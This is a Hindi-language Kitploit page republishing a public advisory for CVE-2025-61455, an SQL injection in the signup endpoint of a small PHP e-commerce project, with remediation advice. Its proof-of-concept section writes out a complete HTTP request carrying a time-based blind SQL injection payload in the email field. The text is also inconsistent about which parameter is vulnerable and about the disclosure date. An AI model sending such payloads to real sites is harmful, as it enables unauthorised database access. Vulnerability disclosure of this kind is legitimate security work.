Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-61455 — CVE-2025-61455 के लिए सार्वजनिक प्रकटीकरण और प्रूफ-ऑफ-कॉन्सेप्ट, जो E-commerce Project v1.0 में एक गंभीर SQL इंजेक्शन है, जिसमें तकनीकी विवरण, PoC, और शमन अनुशंसाएँ शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/tansique-17/cve-2025-61455
भेद्यता विश्लेषणशोषणवेब सुरक्षालर्निंग और शिक्षाचयनित संसाधन
GitHubtansique-17/cve-2025-61455

CVE-2025-61455

CVE-2025-61455 के लिए सार्वजनिक प्रकटीकरण और प्रूफ-ऑफ-कॉन्सेप्ट, जो E-commerce Project v1.0 में एक गंभीर SQL इंजेक्शन है, जिसमें तकनीकी विवरण, PoC, और शमन अनुशंसाएँ शामिल हैं।

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं
वेबसाइट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🛡️ CVE प्रकटीकरण: CVE-2025-61455 — ई-कॉमर्स प्रोजेक्ट में SQL इंजेक्शन

प्रकटीकरण तिथि: 14 अक्टूबर 2025
CVE ID: CVE-2025-61455
गंभीरता: CRITICAL (CVSS 9.8)


🧩 सारांश

E-commerce Project v1.0 में एक गंभीर SQL इंजेक्शन भेद्यता मौजूद है, विशेष रूप से signup.inc.php एंडपॉइंट के भीतर। एप्लिकेशन सीधे SQL क्वेरी में अस्वच्छित उपयोगकर्ता इनपुट शामिल करता है, जिससे बिना प्रमाणीकरण के हमलावर प्रमाणीकरण को बायपास कर सकते हैं और मनमाने SQL कमांड निष्पादित कर सकते हैं।

इस समस्या को पहचानकर्ता CVE-2025-61455 सौंपा गया है। सार्वजनिक प्रकटीकरण के समय, कोई आधिकारिक पैच उपलब्ध नहीं था।


📦 प्रभावित उत्पाद

  • विक्रेता: स्वतंत्र (Bhabishya-123)
  • प्रोजेक्ट: E-commerce
  • संस्करण: v1.0
  • फ़ाइल: signup.inc.php
  • संवेदनशील एंडपॉइंट:

https://localhost/e-commerce-main/includes/signup.inc.php

🔬 भेद्यता विवरण

एप्लिकेशन बिना किसी इनपुट सत्यापन या तैयार स्टेटमेंट के SQL क्वेरी में सीधे अस्वच्छित इनपुट का उपयोग करता है। यह भेद्यता signup.inc.php फ़ाइल के aid पैरामीटर में मौजूद है।

एक हमलावर ईमेल पैरामीटर के माध्यम से दुर्भावनापूर्ण SQL कोड इंजेक्ट कर सकता है, जिससे समय-आधारित ब्लाइंड SQL इंजेक्शन हमले संभव हो सकते हैं।

उदाहरण संवेदनशील कोड पैटर्न:

root@kitploit:~
$query = "SELECT * FROM table WHERE email='$email'";

यह इंजेक्शन पेलोड की अनुमति देता है जो क्वेरी तर्क में हेरफेर कर सकता है और संवेदनशील डेटा निकाल सकता है।


📌 CWE वर्गीकरण

CWE IDशीर्षक
CWE-89SQL कमांड में उपयोग किए गए विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन

📊 CVSS v3.1 स्कोर

स्कोरगंभीरतावेक्टर स्ट्रिंग
9.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

💥 प्रभाव

सफल शोषण के परिणामस्वरूप निम्नलिखित हो सकते हैं:

  • ✅ पूर्ण प्रमाणीकरण बायपास
  • 🔓 विशेषाधिकार प्राप्त सुविधाओं तक अनधिकृत पहुंच
  • 📊 समय-आधारित ब्लाइंड SQL इंजेक्शन के माध्यम से डेटा निष्कर्षण
  • 🛠️ डेटा हेरफेर या विलोपन की संभावना
  • ⚠️ बैकएंड डेटाबेस का पूर्ण समझौता
  • 💻 रिमोट कोड निष्पादन की संभावना

🧪 प्रूफ ऑफ कॉन्सेप्ट (PoC)

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/Bhabishya-123/E-commerce.git

2. स्थानीय रूप से होस्ट करें

प्रोजेक्ट को तैनात करने के लिए XAMPP/LAMP का उपयोग करें और नेविगेट करें:

root@kitploit:~
http://localhost/e-commerce-main/includes/signup.inc.php

3. पेलोड इंजेक्शन

निम्नलिखित दुर्भावनापूर्ण HTTP अनुरोध भेजें:

root@kitploit:~
POST /e-commerce-main/includes/signup.inc.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

name=DvYLInUG&[email protected]'%2b(select*from(select(sleep(20)))a)%2b'&address=BWhKCxUw&number=666897&pwd=n7N%21j3r%21T7&rpwd=k0U%21t0f%21E9&submit=

स्पष्टीकरण:
ईमेल पैरामीटर में एक समय-आधारित SQL इंजेक्शन पेलोड शामिल है: '+(select*from(select(sleep(20)))a)+'

यदि एप्लिकेशन प्रतिक्रिया देने से पहले 20 सेकंड की देरी करता है, तो SQL इंजेक्शन सफल है।


🔐 अनुशंसाएँ

  • ✅ डायनामिक SQL क्वेरी को तैयार स्टेटमेंट (mysqli_prepare() या PDO) से बदलें।
  • 🔍 सभी उपयोगकर्ता इनपुट के लिए इनपुट सत्यापन और स्वच्छता करें।
  • 🧱 ज्ञात SQL इंजेक्शन पैटर्न को ब्लॉक करने के लिए वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें।
  • 🛡️ शीघ्र पहचान के लिए नियमित कोड ऑडिट और पेनेट्रेशन टेस्टिंग करें।
  • 🔒 सभी डेटाबेस इंटरैक्शन के लिए पैरामीटराइज़्ड क्वेरी लागू करें।
  • 📝 जहाँ संभव हो इनपुट सत्यापन के लिए अनुमत सूची का उपयोग करें।

📆 समयरेखा

घटनातिथि
भेद्यता की खोज16 सितंबर 2025
सार्वजनिक प्रकटीकरण13 अक्टूबर 2025
पैच उपलब्ध❌ प्रकटीकरण के अनुसार उपलब्ध नहीं

🙋‍♂️ श्रेय

यह भेद्यता निम्नलिखित व्यक्ति द्वारा खोजी और जिम्मेदारी से प्रकट की गई:

Tansique Dasari
🔗 GitHub
✉️ [email protected]


🔗 संदर्भ

  • OWASP - SQL इंजेक्शन
  • PortSwigger - SQL इंजेक्शन
  • CVE.org पर CVE-2025-61455

💬 यह सलाह विक्रेता की प्रतिक्रिया की कमी के कारण स्वतंत्र रूप से प्रकाशित की गई है।

टूल डाउनलोड करें